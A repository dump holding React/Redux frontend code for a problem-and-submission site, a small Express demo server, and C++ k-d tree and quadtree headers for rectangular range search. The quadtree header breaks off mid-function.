submitted_by: null,
active: null
},
reply: null,
submissionFormSubmitted: false
}
function problemPageReducer(state = defaultState, action) {
const findContentInEntries = (entries, contentId) => {
for (var i = 0; i < entries.length; ++i) {
if (entries[i][contentId]) {
return entries[i][contentId]
}
}
return undefined;
}
const transformEntries = (entries) => {
entries = entries ? entries : []
const transformed_entries = {}
entries.forEach(entry => {
transformed_entries[entry._id] = {...entry, _id:undefined}
})
return transformed_entries
}
const createPagingState = (submissions) => {
return submissions.map(submission => {
return ({
_id: submission._id,
page: 0,
hasMore: submission.replies.length > 0
})
})
}
const newSubmissionEntries = state.submissionEntries
const newPaging = {...state.paging}
const submission = (action.submission) ? findContentInEntries(newSubmissionEntries, action.submission) : null
switch (action.type) {
case problemPageConstants.LOAD_PROBLEM_DATA_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType,
problem: undefined
}
case problemPageConstants.LOAD_REPLY_PAGE_FAILED:
case problemPageConstants.POST_SUBMISSION_FAILED:
case problemPageConstants.REPLY_SUBMISSION_FAILED:
case problemPageConstants.ACCEPT_SUBMISSION_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType
}
case problemPageConstants.LOAD_PROBLEM_DATA_REQUEST:
return {
...state,
message: "Waiting for problem data",
messageType: action.messageType
}
case problemPageConstants.LOAD_PROBLEM_DATA_SUCCESS:
const keep_problem_data = action.problem && state.problem && action.problem.id === state.problem.id
return {
...state,
// has to have || {} otherwise throws error, which I dunno how to solve :D
problem: action.problem || {},
paging: keep_problem_data ? state.paging : defaultPaging,
submissionEntries: keep_problem_data ? state.submissionEntries : [],
message: "",
messageType: action.messageType
}
case problemPageConstants.LOAD_SUBMISSION_PAGE_REQUEST:
return {
...state,
message: "Loading more submissions",
messageType: action.messageType
}
case problemPageConstants.LOAD_SUBMISSION_PAGE_SUCCESS:
const activePage = (!action.activePage || action.activePage <= 1) ? 1 : action.activePage
newSubmissionEntries[activePage - 1] = transformEntries(action.data.map(x => ({...x, replyEntries: [], repliesHidden: true})))
newPaging.page = (action.data && action.data.length > 0) ? activePage : state.paging.page
newPaging.hasMore = action.hasMore
Object.assign(newPaging, transformEntries(createPagingState(action.data)))
return {
...state,
submissionEntries: newSubmissionEntries.slice(0,activePage),
paging: newPaging,
message: "",
messageType: action.messageType
}
case problemPageConstants.LOAD_SUBMISSION_PAGE_FAILED:
newPaging.hasMore = false
return {
...state,
message: action.message,
messageType: action.messageType,
paging: newPaging
}
case problemPageConstants.LOAD_REPLY_PAGE_REQUEST:
return {
...state,
message: "Loading more replies",
messageType: action.messageType
}
case problemPageConstants.LOAD_REPLY_PAGE_SUCCESS:
const activeReplyPage = (!action.activeReplyPage || action.activeReplyPage <= 1) ? 1 : action.activeReplyPage
submission.replyEntries[activeReplyPage - 1] = action.data || []
submission.replyEntries = submission.replyEntries.slice(0, activeReplyPage)
submission.repliesHidden = false
if (!newPaging[action.submission]) {
newPaging[action.submission] = {}
}
newPaging[action.submission].page = (action.data && action.data.length > 0) ? activeReplyPage : newPaging[action.submission].page
newPaging[action.submission].hasMore = action.hasMore
return {
...state,
submissionEntries: newSubmissionEntries,
paging: newPaging,
message: "",
messageType: action.messageType
}
case problemPageConstants.POST_SUBMISSION_REQUEST:
return {
...state,
message: "Posting submission",
messageType: action.messageType
}
case problemPageConstants.POST_SUBMISSION_SUCCESS:
if (newSubmissionEntries.length === 0) {
newSubmissionEntries.push({})
}
newSubmissionEntries[newSubmissionEntries.length - 1][action.submission._id] = {...action.submission, replyEntries: [], repliesHidden: true, _id:undefined}
Object.assign(newPaging, transformEntries(createPagingState([action.submission])))
return {
...state,
submissionEntries: newSubmissionEntries,
paging: newPaging,
submissionFormSubmitted: true,
message: "",
messageType: action.messageType
}
case problemPageConstants.REPLY_SUBMISSION_REQUEST:
return {
...state,
message: "Posting reply",
messageType: action.messageType
}
case problemPageConstants.REPLY_SUBMISSION_SUCCESS:
if (submission.replyEntries.length === 0) {
submission.replyEntries.push({})
}
submission.repliesHidden = false
submission.replyEntries[submission.replyEntries.length - 1][action.reply._id] = {...action.reply, _id:undefined}
return {
...state,
submissionEntries: newSubmissionEntries,
message: "",
messageType: action.messageType,
reply: null
}
case problemPageConstants.ACCEPT_SUBMISSION_REQUEST:
return {
...state,
message: 'Marking as solved',
messageType: action.messageType
}
case problemPageConstants.ACCEPT_SUBMISSION_SUCCESS:
state.problem.accepted_submission = {...submission, _id: action.submission}
return {
...state,
message: "",
messageType: action.messageType
}
case problemPageConstants.SELECT_REPLY_FORM:
return {
...state,
reply: (action.reply === state.reply) ? null : action.reply,
message: "",
messageType: action.messageType
}
case problemPageConstants.HIDE_REPLIES:
submission.repliesHidden = true
newPaging[action.submission] = defaultPaging
return {
...state,
submissionEntries: newSubmissionEntries,
paging: newPaging
}
case problemPageConstants.RESET:
return defaultState
default:
return state
}
}
export default combineReducers({
page: problemPageReducer,
form: reducer
})
<file_sep>/src/styled-components/defaults/CenteredDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { sidebarStyleConstants } from '../sidebars/Constants';
const BuzzfeedCenteredDiv = styled.div`
text-align: center;
${props => props.fullWidth && `
@media(min-width: ${sidebarStyleConstants.SIDEBAR_COLLAPSE}) {
margin-right: 16%;
}
`}
`
const TryhardCenteredDiv = props => <div {...props} fullWidth={undefined} textLeft={undefined}/>
const CenteredDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedCenteredDiv {...props} />}
tryhard={<TryhardCenteredDiv {...props} />}
/>
export default CenteredDiv<file_sep>/src/styled-components/problem/SubmissionBox.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedSubmissionBox = styled.div`
${props => props.solution && `
box-shadow: 5px 10px 18px rgba(0, 124, 30, 0.5);
border: 2px solid #0d3e00;
margin-bottom: 20px;
`}
border-radius: 10px;
padding: 8px;
margin: 10px auto 0 auto;
background-color: rgba(67, 0, 50, 0.5);
ul {
list-style-type: none;
}
`
const TryhardSubmissionBox = props => <div {...props} solution={undefined}/>
const SubmissionBox = props => <ThemeSelector
buzzfeed={<BuzzfeedSubmissionBox {...props} />}
tryhard={<TryhardSubmissionBox {...props} />}
/>
export default SubmissionBox<file_sep>/src/actions/content/signup.jsx
import { signupConstants } from '../../constants/content/signUpPage'
import { appConfig } from '../../appConfig'
import { messageType } from '../../constants/misc/backendMessageTypes'
export const signupActions = {
signup,
validateField,
reset
};
function signup(user) {
return dispatch => {
dispatch(request());
fetch(appConfig.backendUrl + "/signup", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(user)
}).then(response => {
// NOTE: refactor this
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(user => {
dispatch(success(user))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
function request() { return { type: signupConstants.REQUEST } }
function success({user}) { return { type: signupConstants.SUCCESS, user } }
function failure(message) { return { type: signupConstants.FAILED, message, messageType: messageType.ERROR } }
}
// this const should match the const in SignUp Form
const availableFields = ['username', 'password', 'email']
function validateField(values, field) {
if (!field) {
return new Promise(resolve => resolve())
}
if (!availableFields.includes(field)) {
return new Promise((resolve, reject) => reject({[field]: 'Invalid field'}))
}
return new Promise((resolve, reject) => {
fetch(appConfig.backendUrl + "/valid/" + field, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({[field]: values[field]})
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return resolve()
}
return response.json().then(data => {
return reject({[field]: data.message})
})
})
})
}
function reset() {
return {
type: signupConstants.RESET
}
}
<file_sep>/src/styled-components/header/ThemeDropdownEntry.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedDropdownEntry = styled.li`
margin: 0px 10px 0px 10px;
font-family: Helvetica, Arial, Sans-Serif;
font-weight: bold;
div {
color: green;
}
:hover {
background-color: #e5e5e5;
color: black;
cursor: pointer;
text-decoration: underline;
}
`
//bf8000
const TryhardDropdownEntry = styled.li `
:hover {
cursor: pointer;
}
`
const DropdownEntry = props => <ThemeSelector
buzzfeed={<BuzzfeedDropdownEntry {...props} />}
tryhard={<TryhardDropdownEntry {...props} />}
/>
export default DropdownEntry<file_sep>/src/components/queue/QueueDropdown.jsx
import React from 'react';
import { Link } from "react-router-dom"
import { connect } from 'react-redux'
import { globalActions } from '../../actions/global'
import StyledQueueDropdown from '../../styled-components/sidebars/QueueDropdown'
import QueueDropdownEntries from '../../styled-components/sidebars/QueueDropdownEntries'
const mapStateToProps = state => ({
displayed: state.global.linQueuesDisplayed,
linQueues: state.global.linQueues
})
const mapDispatchToProps = dispatch => {
return {
show: () => dispatch(globalActions.showLinQueues()),
hide: () => dispatch(globalActions.hideLinQueues())
}
}
class QueueDropdown extends React.Component {
componentWillUnmount() {
if (this.props.displayed) {
this.props.hide()
}
}
render() {
return (
<div className="dropdown" >
<StyledQueueDropdown onClick={this.props.displayed ? this.props.hide : this.props.show}> Pick a Queue </StyledQueueDropdown>
{ this.props.displayed && (
<QueueDropdownEntries>
{this.props.linQueues.map((q, index) => <li key={index} value={q} onClick={() => this.props.hide()}><Link to={this.props.baseUrl + '/' + q}>{q}</Link></li>)}
</QueueDropdownEntries>
)}
</div>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(QueueDropdown)<file_sep>/src/styled-components/defaults/ButtonDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ButtonsDiv from './ButtonsDiv'
import ThemeSelector from '../ThemeSelector'
const BuzzfeedRepliesButtonsBlock = styled(ButtonsDiv)`
display: flex;
`
const TryhardRepliesButtonsBlock = props => <button {...props} />
const RepliesButtonsBlock = props => <ThemeSelector
buzzfeed={<BuzzfeedRepliesButtonsBlock {...props} />}
tryhard={<TryhardRepliesButtonsBlock {...props} />}
/>
export default RepliesButtonsBlock;
<file_sep>/src/reducers/content.jsx
import { combineReducers } from 'redux'
import signupReducer from './content/signupPage'
import loginReducer from './content/loginPage'
import forgotPwdReducer from './content/forgotPwdPage'
import queuePageReducer from './content/queuePage'
import problemPageReducer from './content/problemPage'
import statisticsReducer from './content/statistics'
import submitProblemPageReducer from './content/submitProblemPage'
import boostPageReducer from './content/boost'
import profileReducer from './content/profile'
import confirmReducer from './content/confirm'
export const contentReducer = combineReducers({
signup: signupReducer,
login: loginReducer,
forgotPwd: forgotPwdReducer,
queuePage: queuePageReducer,
problemPage: problemPageReducer,
submitProblem: submitProblemPageReducer,
boost: boostPageReducer,
statistics: statisticsReducer,
confirm: confirmReducer,
profile: profileReducer
})
<file_sep>/src/components/queue/QueuePage.jsx
import React from 'react';
//
import { connect } from 'react-redux'
import InfiniteScroll from 'react-infinite-scroller';
import { Link } from "react-router-dom"
import { queuePageActions } from '../../actions/content/queuePage'
import QueueSidebar from './QueueSidebar'
import { ProblemBox } from '../problem/ProblemBox'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import ProblemBoxWrapper from '../../styled-components/problem-related/ProblemBoxWrapper'
const mapStateToProps = (state, ownProps) => {
const queue = ownProps.queue
const queueState = state.content.queuePage[queue]
if (!queueState) {
return {
entries: [],
paging: {
page: 0,
hasMore: true
},
queue: queue,
queueExists: state.global.linQueues.includes(queue)
}
}
return {
entries: queueState.entries.reduce((acc, cv) => acc.concat(cv),[]),
paging: queueState.paging,
queue: queue,
loading: queueState.loading,
queueExists: state.global.linQueues.includes(queue)
}
}
const mapDispatchToProps = (dispatch, ownProps) => ({
loadPage: page => dispatch(queuePageActions.setActivePage(ownProps.queue, page)),
setActiveEntry: (page, entry) => dispatch(queuePageActions.setActiveEntry(page, entry)),
reset: () => dispatch(queuePageActions.reset(ownProps.queue))
})
class QueuePage extends React.Component {
componentWillUnmount() {
this.props.reset()
}
componentDidUpdate(prevProps){
if (prevProps.queue !== this.props.queue) {
this.props.loadPage(1)
}
}
componentDidMount() {
this.props.loadPage(1)
}
render() {
const submitProblem = (
<div>
{'Submit problem '}
<Link to={'/submitProblem?q=' + this.props.queue}>here</Link>
</div>
)
const empty = this.props.entries.length === 0
if (empty) {
return (
<PageDiv>
<QueueSidebar />
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<h3>
{this.props.loading ? "Loading" : " There's nothing here"}
</h3>
{this.props.queueExists && submitProblem}
</CenteredDiv>
</ContentDiv>
</PageDiv>
)
}
/*
no need to test if queue doesnt exist, backend returns only empty array
*/
return (
<PageDiv>
<QueueSidebar />
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<h3>{"Problems of queue: " + this.props.queue}</h3>
{this.props.loggedIn && submitProblem}
</CenteredDiv>
<ProblemBoxWrapper>
<InfiniteScroll
pageStart={1}
loadMore={() => {
this.props.loadPage(this.props.paging.page + 1)
}}
hasMore={this.props.paging.hasMore}
loader={<div className="loader" key={0}>Loading ...</div>}
>
<ul>
{
this.props.entries.map((p,index) => (
<li key={index}>
<ProblemBox
id={p._id}
title={p.title}
active={p.active}
created={p.created}
bounty={p.bounty}
loggedIn={this.props.loggedIn}
viewCount={p.view_count}
submissionCount={p.submissions.length}
username={p.username}
/>
</li>
))}
</ul>
</InfiniteScroll>
</ProblemBoxWrapper>
</ContentDiv>
</PageDiv>
);
}
}
export default connect(mapStateToProps, mapDispatchToProps)(QueuePage)
<file_sep>/src/reducers/content/confirm/passwordChange.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { confirmPasswordChangeConstants, confirmPasswordChangeStages } from '../../../constants/content/confirm/passwordChange'
function confirmPasswordChangeReducer(state={}, action) {
switch (action.type) {
case confirmPasswordChangeConstants.VERIFY_REQUEST:
return {
stage: confirmPasswordChangeStages.SUBMITTING_FORM,
message: "Verifying token sent via email",
messageType: action.messageType
}
case confirmPasswordChangeConstants.VERIFY_SUCCESS:
return {
stage: confirmPasswordChangeStages.SUBMITTING_FORM
}
case confirmPasswordChangeConstants.VERIFY_FAILED:
return {
stage: confirmPasswordChangeStages.INVALID_TOKEN,
message: "Invalid token",
messageType: action.messageType
}
case confirmPasswordChangeConstants.CONFIRM_REQUEST:
return {
stage: confirmPasswordChangeStages.SUBMITTING_FORM,
message: "Waiting for server response",
messageType: action.messageType
}
case confirmPasswordChangeConstants.CONFIRM_SUCCESS:
return {
stage: confirmPasswordChangeStages.COMPLETED,
message: "Password successfully changed",
messageType: action.messageType,
verified: true
}
case confirmPasswordChangeConstants.CONFIRM_FAILED:
return {
stage: confirmPasswordChangeStages.SUBMITTING_FORM,
message: action.message,
messageType: action.messageType,
verified: state.verified || false
}
case confirmPasswordChangeConstants.RESET:
return {
stage: confirmPasswordChangeStages.INVALID_TOKEN
}
default:
return state
}
}
const passwordChangeFormReducer = reducer;
export default combineReducers({
page: confirmPasswordChangeReducer,
form: passwordChangeFormReducer
})
<file_sep>/src/styled-components/problem-related/ProblemBoxWrapper.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { sidebarStyleConstants } from '../sidebars/Constants'
const BuzzfeedProblemBoxWrapper = styled.div`
margin-left: auto;
margin-right: auto;
width: 100%;
display: flex;
flex-wrap: wrap;
justify-content: space-between;
align-items: center;
ul {
list-style-type: none;
padding: 0;
}
li {
display: inline-block;
}
@media(max-width: ${sidebarStyleConstants.SIDEBAR_COLLAPSE}) {
display: block;
flex-wrap: nowrap;
li {
display: block;
left: -50px;
}
}
`
const TryhardProblemBoxWrapper = props => <div {...props}/>
const ProblemBoxWrapper = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemBoxWrapper {...props} />}
tryhard={<TryhardProblemBoxWrapper {...props} />}
/>
export default ProblemBoxWrapper<file_sep>/src/styled-components/problem/RepliesButton.jsx
import React from 'react'
import styled from 'styled-components';
import Button from '../defaults/Button'
import ThemeSelector from '../ThemeSelector'
const BuzzfeedLoadRepliesButton = styled(Button)`
border: none;
display: inline-block;
`
const TryhardLoadRepliesButton = props => <button {...props} />
const LoadRepliesButton = props => <ThemeSelector
buzzfeed={<BuzzfeedLoadRepliesButton {...props} />}
tryhard={<TryhardLoadRepliesButton {...props} />}
/>
export default LoadRepliesButton;
<file_sep>/src/styled-components/form/ReactSelectDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedReactSelectDiv = styled.div`
margin: 10px 5px 5px 5px;
`
const TryhardReactSelectDiv = props => <div {...props}/>
const ReactSelectDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedReactSelectDiv {...props} />}
tryhard={<TryhardReactSelectDiv {...props} />}
/>
export default ReactSelectDiv | 1f634ac8871c5eda3f0970fba2ef239c2985b20b | [
"JavaScript"
] | 121 | JavaScript | koniferous22/npns-prototype-frontend | ae992267e7c259abd1756aca14dc088af700bc27 | 4f61290eba46e8e7a13bf74ac074f5a91c7841d7 |
refs/heads/master | <repo_name>abdulwahed786/node-api-demo<file_sep>/index.js
// console.log("hello world");
// var x=10;//container
// x="ksjcskjvn";
// x={ 1,2,3,4};
function add(a,b)
{
for(var x=1;x<10;x++)
console.log(a+b);
}
add(" abdiodv "," kdnvkn");<file_sep>/express.js
var express = require('express');
var app = express();
// app.listen(3000);
// console.log("server is running on port 3000");
app.listen(3000, function(req,res){
console.log("server is running on port 3000");
});
//routing HTTP GET
app.get('/', function (req,res) {
res.send('hello expressJS');
});
app.get('/health', function (req,res){
var response = { status : 'Uppp'}; //json data
res.json(response);
// res.send("welcome to health page");
});
| a5deee27739957c22548283072bf98ccc042909b | [
"JavaScript"
] | 2 | JavaScript | abdulwahed786/node-api-demo | 9448d24210d7a18c792d2170d19d981a0cf71c6f | 2f35cd5a5108a63d3a578bee39f6e018e306146d |
refs/heads/master | <file_sep>//
// KdTree.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/12/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_KdTree_h
#define ChurchillNavigationChallenge_KdTree_h
#include "Shared.h"
#include <algorithm>
#include <vector>
const int KD_MAX_DEPTH = 8; // Max depth of the KD tree -- stops subdividing once it reaches this depth
struct KdTree {
Rect bounds;
int depth;
std::vector<Point*> points;
KdTree* left;
KdTree* right;
KdTree() : depth(0), left(0), right(0) { }
};
// Create a new KdTree node and initialize with bounds and dpeth
static KdTree* kdtree_construct(Rect bounds, int depth) {
KdTree* tree = new KdTree();
tree->depth = depth;
tree->bounds = bounds;
return tree;
}
// Delete this kdtree and it's child nodes
static void kdtree_delete(KdTree* tree) {
if (tree->left != 0) {
kdtree_delete(tree->left);
}
if (tree->right != 0) {
kdtree_delete(tree->right);
}
delete tree;
tree = 0;
}
// Method for comparing points by their rank
static inline bool kd_compare_pts_rank(const Point* p1, const Point* p2) {
return p1->rank < p2->rank;
}
// Method for comparing points by their X value
static inline bool kd_compare_pts_x(const Point* p1, const Point* p2) {
return p1->x < p2->x;
}
// Method for comparing points by their Y value
static inline bool kd_compare_pts_y(const Point* p1, const Point* p2) {
return p1->y < p2->y;
}
// Insert a vector of points into the tree
static void kdtree_insert(KdTree* tree, std::vector<Point*>& pts) {
// If we're down to one point, insert it into this leaf node
if (pts.size() == 1) {
tree->points.push_back(pts[0]);
return;
}
// If we've reached the maximum depth, add all remaining points into this leaf node and stop subdividing
if (tree->depth >= KD_MAX_DEPTH) {
for (int i = 0; i < pts.size(); i++) {
tree->points.push_back(pts[i]);
}
// Sort the points by rank so we can get the lowest ranks first when searching
std::sort(tree->points.begin(), tree->points.end(), kd_compare_pts_rank);
// Stop subdividing
return;
}
// Median index for splitting the points
const size_t median_index = pts.size() / 2;
// Select comparison method based on the depth - (even=X, odd=Y)
// Since this is a 2D kdtree, we only have 2 axes
bool (*comparator)(const Point* p1, const Point* p2);
if (tree->depth % 2 == 0)
comparator = &kd_compare_pts_x;
else
comparator = &kd_compare_pts_y;
// Reorder the points vector such that all points with an index value LEFT of the median index
// have an X or Y value (depending on depth) less than the value at the median index.
// Doesn't need to completely sort the vector, which makes it much faster for large data sets
std::nth_element(pts.begin(), pts.begin()+median_index, pts.end(), comparator);
// Add the selected median point to this tree's points vector
tree->points.push_back(pts[median_index]);
// Split the points into the left and right vectors for child noes
std::vector<Point*> left_pts = std::vector<Point*>(pts.begin(), pts.begin() + median_index);
std::vector<Point*> right_pts = std::vector<Point*>(pts.begin() + median_index + 1, pts.end());
// If there are still points on the left side then calculate the new bounds for the left child node and recursively
// add the left points down the tree
if (left_pts.size() > 0) {
Rect left_rect;
if (tree->depth % 2 == 0) {
left_rect.lx = tree->bounds.lx;
left_rect.hx = pts[median_index]->x;
left_rect.ly = tree->bounds.ly;
left_rect.hy = tree->bounds.hy;
} else {
left_rect.lx = tree->bounds.lx;
left_rect.hx = tree->bounds.hx;
left_rect.ly = tree->bounds.ly;
left_rect.hy = pts[median_index]->y;
}
tree->left = kdtree_construct(left_rect, tree->depth+1);
kdtree_insert(tree->left, left_pts);
}
// If there are still points on the right side then calculate the new bounds for the right child node and recursively
// add the riht points down the tree
if (right_pts.size() > 0) {
Rect right_rect;
if (tree->depth % 2 == 0) {
right_rect.lx = pts[median_index]->x;
right_rect.hx = tree->bounds.hx;
right_rect.ly = tree->bounds.ly;
right_rect.hy = tree->bounds.hy;
} else {
right_rect.lx = tree->bounds.lx;
right_rect.hx = tree->bounds.hx;
right_rect.ly = pts[median_index]->y;
right_rect.hy = tree->bounds.hy;
}
tree->right = kdtree_construct(right_rect, tree->depth+1);
kdtree_insert(tree->right, right_pts);
}
}
// Returns the entire subtree with no bounds checking - Used when this node's bounds are fully contained with the search rect
static inline void kdtree_return_subtree(KdTree* tree, std::priority_queue<Point*, std::vector<Point*>>& results, int& ct) {
for (std::vector<Point*>::iterator it = tree->points.begin() ; it != tree->points.end(); ++it) {
if (results.size() < 20) {
results.push(*it);
ct++;
}
else if (results.top()->rank > (*it)->rank) {
results.pop();
results.push(*it);
ct++;
} else {
break;
}
}
if (tree->left != 0) {
kdtree_return_subtree(tree->left, results, ct);
}
if (tree->right != 0) {
kdtree_return_subtree(tree->right, results, ct);
}
}
// Depth-first recursive searching the tree with a 2D rectangular range query and return the results in the results container
static inline void kdtree_search(KdTree* tree, const Rect& query, std::priority_queue<Point*, std::vector<Point*>> & results, int& ct) {
// If this node's bounds are fully contained within the search query bounds, then return the entire subtree
if (rects_contained(query, tree->bounds)) {
kdtree_return_subtree(tree, results, ct);
}
// Else, if there's an intersection between this node's bounds and the search query bounds, keep searching
else if (rects_intersect(tree->bounds, query)) {
// Check all points in this leaf node for containment
for (std::vector<Point*>::iterator it = tree->points.begin() ; it != tree->points.end(); ++it) {
if (pt_contained(query, **it)) {
// For this challenge, we only want the 20 points with the lowest rank value
if (results.size() < 20) {
results.push(*it);
ct++;
}
else if (results.top()->rank > (*it)->rank) {
results.pop();
results.push(*it);
ct++;
} else {
break;
}
}
}
// Recursively search the left node
if (tree->left != 0)
kdtree_search(tree->left, query, results, ct);
// Recursively search the right node
if (tree->right != 0)
kdtree_search(tree->right, query, results, ct);
}
}
#endif
<file_sep>//
// QuadTree.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/11/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_QuadTree_h
#define ChurchillNavigationChallenge_QuadTree_h
#include "Shared.h"
const int QT_MAX_PER_NODE = 32; // Maximun number of points per node before subdividing
const int QT_MAX_DEPTH = 64; // Maximum depth to allow before dumping all additional points into the leaf node
// QuadTree node struct
struct QuadTree {
Rect bounds; // 2D Rectangular bounds of this node
int depth; // Depth of this node in the tree
QuadTree *nw; // Northwest subdivision quadrant
QuadTree *ne; // Northeast subdivision quadrant
QuadTree *sw; // Southwest subdivision quadrant
QuadTree *se; // Southeast subdivision quadrant
std::vector<Point*> pts; // Points in this node
QuadTree() : depth(0), nw(0), sw(0), ne(0), se(0) { }
};
// Create a quadtree node, initialized with bounds and depth
static QuadTree* quadtree_construct(Rect bounds, int depth) {
QuadTree* node = new QuadTree();
node->bounds = bounds;
node->depth = depth;
node->nw = 0;
node->ne = 0;
node->sw = 0;
node->se = 0;
return node;
}
// Delete a root quadtree node and all child nodes
static void quadtree_delete(QuadTree* root) {
if (root != 0) {
quadtree_delete(root->nw);
if (root->ne != 0)
quadtree_delete(root->ne);
if (root->sw != 0)
quadtree_delete(root->sw);
if (root->se != 0)
quadtree_delete(root->se);
delete root;
root = 0;
}
}
// Forward declaration of internal quadtree_insert method (below)
static bool quadtree_insert(QuadTree* node, Point* p);
// Helper method to insert a vector of points at once
// For the Churchill Navigation challenge, these points are sorted in ascending order by their Rank value,
// assuring we always have the lowest ranked nodes at the top level of the tree when searching breadth first
static void quadtree_insert(QuadTree* root, std::vector<Point*>& points, int& ct) {
for (std::vector<Point*>::iterator it = points.begin() ; it != points.end(); ++it) {
quadtree_insert(root, *it);
ct++;
}
}
// Helper method to print out a quadtree node and it's child nodes
static inline void quadtree_print(QuadTree* node) {
printf("QT %.*s depth=%d lx=%d hx=%d ly=%d hy=%d pts=%d \n",
node->depth, " ",
node->depth, node->bounds.lx, node->bounds.hx, node->bounds.ly, node->bounds.hy, node->pts.size());
if (node->nw != 0) {
quadtree_print(node->nw);
if (node->ne != 0)
quadtree_print(node->ne);
if (node->sw != 0)
quadtree_print(node->sw);
if (node->se != 0)
quadtree_print(node->se);
}
}
// Return all points within this node and all of it's children
// This is used when the boundary is fully contained within the search
// range and further rect intersection/containment checks are no longer needed
static inline void quadtree_return_subtree(QuadTree* node, std::priority_queue<Point*, std::vector<Point*>>& results, int& ct) {
// Add all points within this node to the search results container
for (std::vector<Point*>::iterator it = node->pts.begin() ; it != node->pts.end(); ++it) {
if (results.size() < 20) {
results.push(*it);
ct++;
}
else if (results.top()->rank > (*it)->rank) {
results.pop();
results.push(*it);
ct++;
}
}
// Return all results in the child nodes of this node
if (node->nw != 0) {
quadtree_return_subtree(node->nw, results, ct);
quadtree_return_subtree(node->ne, results, ct);
quadtree_return_subtree(node->sw, results, ct);
quadtree_return_subtree(node->se, results, ct);
}
}
// Depth first search the quadtree node (root) for all points within query Rect, add them to the results container
// Top level points in the tree will always have the lowest ranks in that boundary, if we get to 20 (max search result count) we can stop searching
static inline void quadtree_search(QuadTree* node, const Rect query, std::priority_queue<Point*, std::vector<Point*>>& results, int& ct) {
// If this node is fully contained within the search query, return all points in tree below this node
if (rects_contained(query, node->bounds)) {
quadtree_return_subtree(node, results, ct);
}
// If this node's boundary rectangle intersects with the query rectangle, then check all points in this node for containment
// and add to the results container when inside the search rect
else if (rects_intersect(node->bounds, query)) {
for (std::vector<Point*>::iterator it = node->pts.begin() ; it != node->pts.end(); ++it) {
if (pt_contained(query, **it)) {
if (results.size() < 20) {
results.push(*it);
ct++;
}
else if (results.top()->rank > (*it)->rank) {
results.pop();
results.push(*it);
ct++;
}
}
}
// If there was an intersection, then recursively search the child nodes
if (node->nw != 0) {
quadtree_search(node->nw, query, results, ct);
quadtree_search(node->ne, query, results, ct);
quadtree_search(node->sw, query, results, ct);
quadtree_search(node->se, query, results, ct);
}
}
// Else no intersection and no containment, stop recursing the tree
}
// Subdivides this quadtree node assuming a left->right, bottom->up coordinate system
// |
// . (0,1) . (1,1)
// |
// |
// |
//_______.____________. (1,0)
// | (0,0)
// |
static inline void quadtree_subdivide(QuadTree* parent) {
if (parent->nw == 0) {
Rect nw_bounds, ne_bounds, sw_bounds, se_bounds;
// Calculate the child NW bounds
nw_bounds.lx = parent->bounds.lx;
nw_bounds.hx = parent->bounds.lx + ((parent->bounds.hx - parent->bounds.lx) / 2);
nw_bounds.ly = parent->bounds.ly + ((parent->bounds.hy - parent->bounds.ly) / 2);
nw_bounds.hy = parent->bounds.hy;
parent->nw = quadtree_construct(nw_bounds, parent->depth+1);
// Calculate the child NE bounds
ne_bounds.lx = parent->bounds.lx + ((parent->bounds.hx - parent->bounds.lx) / 2);
ne_bounds.hx = parent->bounds.hx;
ne_bounds.ly = parent->bounds.ly + ((parent->bounds.hy - parent->bounds.ly) / 2);
ne_bounds.hy = parent->bounds.hy;
parent->ne = quadtree_construct(ne_bounds, parent->depth+1);
// Calculate the child SW bounds
sw_bounds.lx = parent->bounds.lx;
sw_bounds.hx = parent->bounds.lx + ((parent->bounds.hx - parent->bounds.lx) / 2);
sw_bounds.ly = parent->bounds.ly;
sw_bounds.hy = parent->bounds.ly + ((parent->bounds.hy - parent->bounds.ly) / 2);
parent->sw = quadtree_construct(sw_bounds, parent->depth+1);
// Calculate the child SE bounds
se_bounds.lx = parent->bounds.lx + ((parent->bounds.hx - parent->bounds.lx) / 2);
se_bounds.hx = parent->bounds.hx;
se_bounds.ly = parent->bounds.ly;
se_bounds.hy = parent->bounds.ly + ((parent->bounds.hy - parent->bounds.ly) / 2);
parent->se = quadtree_construct(se_bounds, parent->depth+1);
}
}
// Insert a point into the quadtree
static inline bool quadtree_insert(QuadTree* node, Point* p) {
// If this point is outside the bounds of this node, return false early
if (!pt_contained(node->bounds, *p)) {
return false;
}
// If we have subdivided, add to the children
if (node->nw != 0) {
if (quadtree_insert(node->nw, p))
return true;
if (node->ne != 0)
if (quadtree_insert(node->ne, p))
return true;
if (node->sw != 0)
if (quadtree_insert(node->sw, p))
return true;
if (node->se != 0)
if (quadtree_insert(node->se, p))
return true;
return false;
} else {
// If we haven't subdivided and we haven't reached the max number of points for this node OR we have reached the maximum depth already,
// then add the point to this leaf node
if (node->pts.size() < QT_MAX_PER_NODE || node->depth >= QT_MAX_DEPTH) {
node->pts.push_back(p);
return true;
// Otherwise we subdivide and add the point to the child node it belongs in
} else {
quadtree_subdivide(node);
